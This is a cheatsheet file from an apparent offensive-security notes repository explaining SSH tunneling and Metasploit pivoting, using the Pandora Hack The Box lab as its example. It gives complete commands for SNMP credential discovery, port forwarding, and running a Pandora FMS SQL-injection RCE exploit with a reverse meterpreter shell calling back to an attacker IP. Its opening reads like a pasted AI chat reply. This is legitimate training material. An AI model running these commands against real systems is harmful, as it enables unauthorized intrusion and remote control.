daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ssh-tunneling.md (11961B)


      1 ---
      2 title: "SSH Tunneling & Port Forwarding"
      3 description: "SSH local/remote/dynamic forwarding and Metasploit route/portfwd pivoting, worked end to end."
      4 category: tunneling-pivoting
      5 tags: [pivoting, ssh, port-forwarding]
      6 tools: [SSH, Metasploit]
      7 difficulty: intermediate
      8 updated: "2026-08-09"
      9 source: "vault:Misc/SSH Portfwding with metasploit .md"
     10 ---
     11 
     12 # SSH Tunneling & Port Forwarding
     13 
     14 I'll do a deep research on SSH tunneling with Metasploit, specifically using the Pandora HTB box as a practical example to clarify the correct approach.
     15 
     16 # SSH Tunneling with Metasploit: A Complete Guide (Pandora HTB Edition)
     17 
     18 Your original guide is **mostly correct** for local port forwarding (`ssh -L`), but it lacks clarity on *why* things work and when to use different approaches. Let me clarify the confusion and expand with the Pandora HTB box as a practical example.
     19 
     20 ---
     21 
     22 ## Understanding the Pandora HTB Scenario
     23 
     24 **The Problem:**
     25 * Pandora HTB has a **Pandora FMS web application** running on `127.0.0.1:80` (localhost only)
     26 * It's bound ONLY to loopback—you **cannot** access it from your attacker machine directly
     27 * You gain SSH access as `daniel` user via SNMP credential leak
     28 * You need to access this internal web service to exploit it
     29 
     30 **The Solution:** SSH local port forwarding
     31 
     32 ---
     33 
     34 ## Part 1: SSH Local Port Forward (`ssh -L`) - The Pandora Way
     35 
     36 ### What It Actually Does
     37 
     38 ```bash
     39 ssh -L 9001:localhost:80 daniel@10.10.11.136
     40 ```
     41 
     42 **This creates a PORT MAPPING:**
     43 * Your machine listens on `127.0.0.1:9001`
     44 * Any connection to YOUR `127.0.0.1:9001` → tunneled through SSH → TARGET's `localhost:80`
     45 
     46 **Critical Understanding:**
     47 * The `localhost:80` part is resolved **from the target's perspective**
     48 * You could also forward to OTHER machines the target can reach: `ssh -L 9001:10.10.10.5:80 daniel@target`
     49 
     50 ### Verify the Tunnel
     51 
     52 From **your machine**:
     53 
     54 ```bash
     55 curl -i http://127.0.0.1:9001/pandora_console/
     56 # Or in browser: http://127.0.0.1:9001/pandora_console/
     57 ```
     58 
     59 If you see the Pandora FMS login page, the tunnel works.
     60 
     61 ---
     62 
     63 ## Part 2: Metasploit Configuration with `ssh -L`
     64 
     65 ### Core Principle: You're Targeting YOUR Local Endpoint
     66 
     67 When using `ssh -L`, Metasploit connects to **your local tunnel endpoint**, NOT the remote IP.
     68 
     69 ### Configuration for Pandora FMS Exploit
     70 
     71 ```bash
     72 msfconsole
     73 use exploit/linux/http/pandora_fms_sqli_rce
     74 show options
     75 ```
     76 
     77 **Set these options:**
     78 
     79 | Option | Value | Why |
     80 |--------|-------|-----|
     81 | `RHOSTS` | `127.0.0.1` | The tunnel endpoint is on YOUR localhost |
     82 | `RPORT` | `9001` | YOUR local listening port (not 80!) |
     83 | `SSL` | `false` | Port 80 is HTTP, not HTTPS |
     84 | `TARGETURI` | `/pandora_console/` | Application base path |
     85 | `USERNAME` | `admin` | Default or discovered credentials |
     86 | `PASSWORD` | `pandora` | Default or discovered credentials |
     87 | `Proxies` | **UNSET** | `ssh -L` is NOT a proxy |
     88 
     89 **Commands:**
     90 
     91 ```bash
     92 set RHOSTS 127.0.0.1
     93 set RPORT 9001
     94 set SSL false
     95 set TARGETURI /pandora_console/
     96 set USERNAME admin
     97 set PASSWORD pandora
     98 unset Proxies
     99 ```
    100 
    101 ---
    102 
    103 ## Part 3: The Critical LHOST Confusion (Reverse Shells)
    104 
    105 ### The Two Separate Connections
    106 
    107 When you exploit a service, there are **TWO different network connections**:
    108 
    109 1. **Exploit Delivery** (Metasploit → Web Service):
    110    * Goes through the tunnel
    111    * RHOSTS=127.0.0.1, RPORT=9001
    112 
    113 2. **Reverse Shell** (Target → Attacker):
    114    * Does NOT go through the tunnel (usually)
    115    * LHOST=your_real_IP (e.g., tun0 10.10.14.x)
    116 
    117 ### LHOST Settings for Pandora HTB
    118 
    119 ```bash
    120 set LHOST 10.10.14.50  # Your tun0 VPN IP
    121 set LPORT 4444         # Port where YOU listen for callback
    122 ```
    123 
    124 **Why NOT `127.0.0.1`?**
    125 * If LHOST=127.0.0.1, you're telling the target to connect to **its own** localhost
    126 * The reverse shell would try to connect to itself and fail
    127 
    128 **Why does this work without another tunnel?**
    129 * The target **can reach** your VPN IP directly (10.10.14.x)
    130 * Only the *web service* is localhost-only
    131 * The target machine itself has normal network connectivity
    132 
    133 ### Complete Exploit Command
    134 
    135 ```bash
    136 use exploit/linux/http/pandora_fms_sqli_rce
    137 set RHOSTS 127.0.0.1    # Tunnel endpoint on YOUR machine
    138 set RPORT 9001          # YOUR local port
    139 set SSL false
    140 set TARGETURI /pandora_console/
    141 set USERNAME admin
    142 set PASSWORD pandora
    143 set LHOST 10.10.14.50   # YOUR tun0 IP (for reverse shell)
    144 set LPORT 4444
    145 set PAYLOAD linux/x64/meterpreter/reverse_tcp
    146 exploit
    147 ```
    148 
    149 ---
    150 
    151 ## Part 4: When to Use `ssh -D` (Dynamic SOCKS Proxy)
    152 
    153 ### The Difference
    154 
    155 `ssh -D` is **completely different** from `ssh -L`:
    156 
    157 | Feature | `ssh -L` (Local Forward) | `ssh -D` (SOCKS Proxy) |
    158 |---------|-------------------------|------------------------|
    159 | Type | Direct port mapping | Application-level proxy |
    160 | Targets | ONE specific host:port | ANY host:port through proxy |
    161 | Setup | One tunnel per port | One proxy for everything |
    162 | Metasploit Config | RHOSTS=127.0.0.1, no Proxies | RHOSTS=actual_target, set Proxies |
    163 
    164 ### Creating a SOCKS Proxy
    165 
    166 ```bash
    167 ssh -D 1080 daniel@10.10.11.136
    168 ```
    169 
    170 This creates a **SOCKS5 proxy** on YOUR `127.0.0.1:1080`.
    171 
    172 ### Metasploit Configuration with SOCKS Proxy
    173 
    174 **Key difference:** You now target the **actual remote host**, not 127.0.0.1:
    175 
    176 ```bash
    177 setg Proxies socks5:127.0.0.1:1080
    178 set RHOSTS 10.10.11.136    # Actual target IP
    179 set RPORT 80               # Actual remote port
    180 set SSL false
    181 ```
    182 
    183 **What happens:**
    184 1. Metasploit connects to the SOCKS proxy at 127.0.0.1:1080
    185 2. Proxy forwards the connection through SSH to 10.10.11.136:80
    186 3. The target's localhost services are still unreachable (SOCKS doesn't help here)
    187 
    188 ### When to Use SOCKS (`ssh -D`)
    189 
    190 * **Multiple targets/ports** behind the SSH server
    191 * Scanning entire internal networks
    192 * Dynamic reconnaissance
    193 * When you don't know which ports you'll need in advance
    194 
    195 For Pandora HTB specifically, **`ssh -L` is simpler** because you only need one specific port.
    196 
    197 ---
    198 
    199 ## Part 5: Advanced Scenario - `ssh -R` (Reverse Tunnel)
    200 
    201 ### When Target Cannot Reach You
    202 
    203 Sometimes the target **cannot** connect back to your IP:
    204 * Double NAT
    205 * Firewall blocking outbound
    206 * No route to your network
    207 
    208 **Solution:** Reverse port forward
    209 
    210 ### How `ssh -R` Works
    211 
    212 ```bash
    213 # On your machine, create reverse tunnel:
    214 ssh -R 4444:localhost:4444 daniel@10.10.11.136
    215 
    216 # In another terminal, start local listener:
    217 nc -lvnp 4444
    218 ```
    219 
    220 **What this does:**
    221 * Target's `localhost:4444` → tunneled back through SSH → YOUR `localhost:4444`
    222 * When target connects to its own localhost:4444, it reaches your listener
    223 
    224 ### Metasploit with Reverse Tunnel
    225 
    226 ```bash
    227 # Terminal 1: Start handler on your machine
    228 msfconsole
    229 use multi/handler
    230 set PAYLOAD linux/x64/shell/reverse_tcp
    231 set LHOST 127.0.0.1     # Listen locally
    232 set LPORT 4444
    233 run
    234 
    235 # Terminal 2: Create reverse tunnel and exploit
    236 ssh -R 4444:localhost:4444 daniel@10.10.11.136
    237 
    238 # Terminal 3: Run exploit with tunnel settings
    239 msfconsole
    240 use exploit/linux/http/pandora_fms_sqli_rce
    241 set RHOSTS 127.0.0.1   # Web service tunnel
    242 set RPORT 9001
    243 set LHOST 127.0.0.1    # Target connects to its localhost
    244 set LPORT 4444         # Which forwards to you via ssh -R
    245 set PAYLOAD linux/x64/shell/reverse_tcp
    246 exploit
    247 ```
    248 
    249 ---
    250 
    251 ## Part 6: Complete Pandora HTB Workflow
    252 
    253 ### Step 1: Reconnaissance
    254 
    255 ```bash
    256 # Enumerate SNMP (finds daniel's credentials)
    257 snmpwalk -v 2c -c public 10.10.11.136
    258 ```
    259 
    260 ### Step 2: SSH Access
    261 
    262 ```bash
    263 ssh daniel@10.10.11.136
    264 # Password discovered via SNMP
    265 ```
    266 
    267 ### Step 3: Port Forward (keep this running)
    268 
    269 ```bash
    270 ssh -L 9001:localhost:80 daniel@10.10.11.136 -N
    271 # -N means "don't execute commands, just forward"
    272 ```
    273 
    274 ### Step 4: Verify Access
    275 
    276 ```bash
    277 curl http://127.0.0.1:9001/pandora_console/
    278 ```
    279 
    280 ### Step 5: Exploit with Metasploit
    281 
    282 ```bash
    283 msfconsole -q
    284 use exploit/linux/http/pandora_fms_sqli_rce
    285 
    286 # Access the web service via tunnel
    287 set RHOSTS 127.0.0.1
    288 set RPORT 9001
    289 set SSL false
    290 set TARGETURI /pandora_console/
    291 
    292 # Credentials (default or discovered)
    293 set USERNAME admin
    294 set PASSWORD pandora
    295 
    296 # Reverse shell comes back directly (not through tunnel)
    297 set LHOST 10.10.14.50    # Your tun0 IP
    298 set LPORT 4444
    299 
    300 # Payload
    301 set PAYLOAD linux/x64/meterpreter/reverse_tcp
    302 
    303 # No proxy needed for ssh -L
    304 unset Proxies
    305 
    306 show options
    307 check
    308 exploit
    309 ```
    310 
    311 ---
    312 
    313 ## Part 7: Common Mistakes & Fixes
    314 
    315 ### ❌ Mistake 1: Setting RHOSTS to Target IP
    316 
    317 ```bash
    318 set RHOSTS 10.10.11.136  # WRONG with ssh -L
    319 set RPORT 80
    320 ```
    321 
    322 **Why it fails:** You're bypassing the tunnel and trying to connect directly (which is blocked).
    323 
    324 **Fix:**
    325 ```bash
    326 set RHOSTS 127.0.0.1   # Your local tunnel endpoint
    327 set RPORT 9001         # Your local port
    328 ```
    329 
    330 ---
    331 
    332 ### ❌ Mistake 2: Setting LHOST to 127.0.0.1
    333 
    334 ```bash
    335 set LHOST 127.0.0.1    # WRONG for standard reverse shell
    336 ```
    337 
    338 **Why it fails:** Target tries to connect to its own localhost, not you.
    339 
    340 **Fix:**
    341 ```bash
    342 set LHOST 10.10.14.50  # Your tun0 IP that target can reach
    343 ```
    344 
    345 ---
    346 
    347 ### ❌ Mistake 3: Using Proxies with `ssh -L`
    348 
    349 ```bash
    350 set Proxies socks5:127.0.0.1:1080  # WRONG with ssh -L
    351 ```
    352 
    353 **Why it's wrong:** `ssh -L` is not a proxy, it's a direct port mapping.
    354 
    355 **Fix:**
    356 ```bash
    357 unset Proxies
    358 unsetg Proxies
    359 ```
    360 
    361 ---
    362 
    363 ### ❌ Mistake 4: Wrong SSL Setting
    364 
    365 ```bash
    366 set SSL true  # WRONG when forwarding HTTP port 80
    367 ```
    368 
    369 **Why it fails:** Metasploit tries HTTPS but port 80 speaks HTTP.
    370 
    371 **Fix:**
    372 ```bash
    373 set SSL false  # Match the actual protocol
    374 ```
    375 
    376 ---
    377 
    378 ## Part 8: Decision Tree
    379 
    380 ### Which Tunneling Method?
    381 
    382 ```
    383 Need to access localhost-only service?
    384 │
    385 ├─ YES: Need ONE specific port?
    386 │   └─ Use: ssh -L 9001:localhost:80 user@target
    387 │   └─ Metasploit: RHOSTS=127.0.0.1, RPORT=9001, unset Proxies
    388 │
    389 ├─ YES: Need MULTIPLE ports/hosts?
    390 │   └─ Use: ssh -D 1080 user@target
    391 │   └─ Metasploit: setg Proxies socks5:127.0.0.1:1080, RHOSTS=actual_IP
    392 │
    393 └─ NO: Direct access works
    394     └─ Just set RHOSTS=target_IP normally
    395 ```
    396 
    397 ### Can Target Reach You for Reverse Shell?
    398 
    399 ```
    400 Target can connect to your IP?
    401 │
    402 ├─ YES (normal case):
    403 │   └─ LHOST=your_tun0_IP (e.g., 10.10.14.50)
    404 │
    405 ├─ NO (firewall/NAT blocks):
    406 │   └─ Use: ssh -R 4444:localhost:4444 user@target
    407 │   └─ LHOST=127.0.0.1 (target's localhost forwards to you)
    408 │
    409 └─ UNSURE:
    410     └─ Try: python3 -m http.server 8000
    411     └─ On target: curl http://your_IP:8000
    412     └─ If works: use your_IP, if fails: use ssh -R
    413 ```
    414 
    415 ---
    416 
    417 ## Part 9: Auxiliary/Scanner Modules (No LHOST Needed)
    418 
    419 For modules that just **query** the service (no reverse shell):
    420 
    421 ```bash
    422 use auxiliary/scanner/http/http_version
    423 set RHOSTS 127.0.0.1
    424 set RPORT 9001
    425 set SSL false
    426 unset Proxies
    427 run
    428 ```
    429 
    430 **Notice:** No LHOST/LPORT because there's no reverse connection.
    431 
    432 ---
    433 
    434 ## Summary Table: Metasploit Settings by Tunnel Type
    435 
    436 | Tunnel Type | RHOSTS | RPORT | Proxies | LHOST (if reverse shell) |
    437 |-------------|--------|-------|---------|--------------------------|
    438 | `ssh -L 9001:localhost:80` | `127.0.0.1` | `9001` | **unset** | Your real IP (10.10.14.x) |
    439 | `ssh -D 1080` | Actual target IP | Actual port | `socks5:127.0.0.1:1080` | Your real IP (10.10.14.x) |
    440 | `ssh -R 4444:localhost:4444` | `127.0.0.1` (for web) | `9001` (for web) | **unset** | `127.0.0.1` (target's localhost) |
    441 | No tunnel | Actual target IP | Actual port | **unset** | Your real IP (10.10.14.x) |
    442 
    443 ---
    444 
    445 ## What Your Original Guide Got Right
    446 
    447 * ✅ RHOSTS=127.0.0.1 for `ssh -L`
    448 * ✅ RPORT=local_listening_port for `ssh -L`
    449 * ✅ Unset Proxies for `ssh -L`
    450 * ✅ LHOST/LPORT mostly not needed for scanner modules
    451 
    452 ## What It Missed
    453 
    454 * ❌ **WHY** RHOSTS is 127.0.0.1 (it's YOUR local endpoint)
    455 * ❌ LHOST for reverse shells (needs your real IP)
    456 * ❌ When to use `ssh -D` vs `ssh -L`
    457 * ❌ `ssh -R` for when target can't reach you
    458 * ❌ The distinction between "accessing service" and "receiving reverse shell"
    459 
    460 ---
    461 
    462 This guide should clear up the confusion. The Pandora HTB example is perfect for understanding these concepts because it demonstrates the exact scenario where `ssh -L` shines.